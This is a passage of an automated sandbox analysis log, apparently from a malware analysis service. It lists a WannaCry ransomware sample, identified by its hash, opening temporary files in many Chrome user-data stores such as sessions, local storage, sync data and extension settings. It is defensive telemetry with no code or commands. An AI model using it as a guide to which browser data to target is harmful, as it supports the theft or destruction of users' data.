              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\~SDAD6B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SD386A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\~SDAD74.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\~SD388E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\~SDAD65.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SD381B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SD383A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\~SDAD80.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\~SDAD7F.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\~SD3873.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\~SDAD6E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\~SDAD76.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\~SD386D.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\~SDAD77.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SD384C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SD383B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SD3841.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SD3844.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\~SD3864.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\~SDAD78.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\~SDAD79.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\~SDAD67.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\~SD3887.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SD3867.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SD3831.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\~SDAD7D.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\~SDAD6F.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\~SD383C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\~SDAD72.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\~SDAD66.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\~SD3863.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\~SD388B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\~SDAD71.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\~SD388D.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\~SDAD73.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\~SD388F.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\~SDAD70.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\~SDAD91.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SD3843.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SD3835.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SD381E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SD3839.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\~SD3889.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\~SDAD6C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\~SD386E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SD3832.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SD3860.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e006fff6-4826-419e-bdc5-6e1781689c76\~SD381C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\~SD3872.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SD3869.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\~SDAD68.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gdaefkejpgkiemlaofpalmlakkmbjdnl\~SD3847.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SD3848.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\~SD388C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\~SD3837.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SD3868.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SD3849.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\~SD3871.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\~SD3890.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\~SD3865.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SD3833.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SD385F.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\~SD388A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\~SD386B.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SD3866.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SD3819.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\~SD386C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SD381F.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SD3836.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SD3842.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SD3830.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SD3840.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\~SD3846.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SD381A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\~SDAD6A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\~SD3888.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\~SDAD69.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\~SDAD75.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\~SD3870.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\~SDAD7A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SD383E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SD3845.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\~SD3891.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\~SDAD7C.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\~SD3874.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\~SD3892.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SD3834.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SD383D.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\~SD3876.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SD384A.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\~SD386F.tmpJump to behavior
